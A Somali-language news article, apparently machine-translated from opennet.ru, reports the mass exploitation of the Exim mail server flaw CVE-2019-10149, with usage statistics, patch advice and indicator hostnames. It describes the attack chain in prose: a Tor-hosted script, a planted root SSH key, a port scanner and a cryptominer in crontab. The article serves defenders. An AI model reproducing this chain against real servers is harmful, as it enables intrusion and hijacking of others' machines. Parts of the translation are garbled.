ProHoster > Блог > wararka internetka > Weerar baaxad leh oo lagu qaaday server-yada fariimaha ku salaysan ee Exim ee nugul

Weerar baaxad leh oo lagu qaaday server-yada fariimaha ku salaysan ee Exim ee nugul

Baarayaasha amniga ee Cybereason ka digay maamulayaasha mailka ee ku saabsan aqoonsiga weerar toos ah oo ka faa'iidaysigiisa baylahda halista ah (CVE-2019-10149) gudaha Exim, oo la helay todobaadkii hore. Inta lagu jiro weerarka, weeraryahanadu waxay ku guuleystaan ​​fulinta koodkooda xuquuqda xididka waxayna ku rakibaan malware server-ka si ay u qodaan cryptocurrencies.

Sida laga soo xigtay June sahamin toos ah Saamiga Exim waa 57.05% (sanad ka hor 56.56%), Postfix waxaa loo adeegsaday 34.52% (33.79%) ee server-yada boostada, Sendmail - 4.05% (4.59%), Microsoft Exchange - 0.57% (0.85%). By sida ku cad Adeegga Shodan ayaa weli ah mid u nugul in ka badan 3.6 milyan oo adeegayaasha boostada ee shabakadda caalamiga ah kuwaas oo aan la cusboonaysiin ilaa hadda siideynta ugu dambeysay ee Exim 4.92. Qiyaastii 2 milyan oo adeegayaal u nugul ayaa ku yaal Maraykanka, 192 kun ee Ruushka. By macluumaad Shirkadda RiskIQ waxay mar hore u beddeshay nooca 4.92 ee 70% adeegayaasha Exim.

Weerar baaxad leh oo lagu qaaday server-yada fariimaha ku salaysan ee Exim ee nugul

Maamulayaasha waxaa lagula talinayaa inay si degdeg ah u rakibaan cusbooneysiinta ay diyaariyeen qalabka qaybinta usbuucii hore (Debian, Ubuntu, furanSUSE, Arch Linux, Fedora, EPEL ee RHEL/CentOS). Haddii nidaamku leeyahay nooca nugul ee Exim (laga bilaabo 4.87 ilaa 4.91 inclusive), waxaad u baahan tahay inaad hubiso in nidaamka uusan horeyba u jabin adoo hubinaya crontab wicitaanada shakiga leh iyo hubinta inaysan jirin furayaal dheeri ah oo ku jira /root/. ssh directory. Weerarka waxa kale oo lagu tilmaami karaa joogitaanka log of firewall ee hawl-wadeenada an7kmd2wp4xo7hpr.tor2web.su, an7kmd2wp4xo7hpr.tor2web.io iyo an7kmd2wp4xo7hpr.onion.sh, kuwaas oo loo isticmaalo soo dejinta malware.

Isku daygii ugu horreeyay ee lagu weeraray server-yada Exim duubay 9-ka Juun. Ilaa June 13 weerar ayaa aqbalay tiro dabeecad. Ka dib marka laga faa'iidaysto nuglaanta iyada oo loo marayo albaabada tor2web, qoraal ayaa laga soo dejiyaa adeegga qarsoon ee Tor (an7kmd2wp4xo7hpr) kaas oo hubinaya joogitaanka OpenSSH (haddii aysan ahayn). dhigaya), beddelaa habaynteeda (ogolaanaya root login iyo xaqiijinta furaha) oo dejisa isticmaalaha xidid RSA furaha, kaas oo ku siinaya galaangal mudnaan leh oo nidaamka loo maro SSH.

Ka dib markii la dejiyo albaabka dambe, scanner deked ayaa lagu rakibay nidaamka si loo aqoonsado adeegayaasha kale ee nugul. Nidaamka ayaa sidoo kale la raadiyaa nidaamyada macdanta ee jira, kuwaas oo la tirtiro haddii la aqoonsado. Marxaladda ugu dambeysa, macdan qodayaashaada ayaa la soo dejisan doonaa oo laga diiwaan geliyay crontab. Macdanta waxaa lagu soo dejiyey magaca faylka ico (dhab ahaantii waa kaydka zip oo leh erayga sirta ah "no-password"), kaas oo ka kooban faylka la fulin karo ee qaabka ELF ee Linux oo leh Glibc 2.7+.

Source: opennet.ru

Add a comment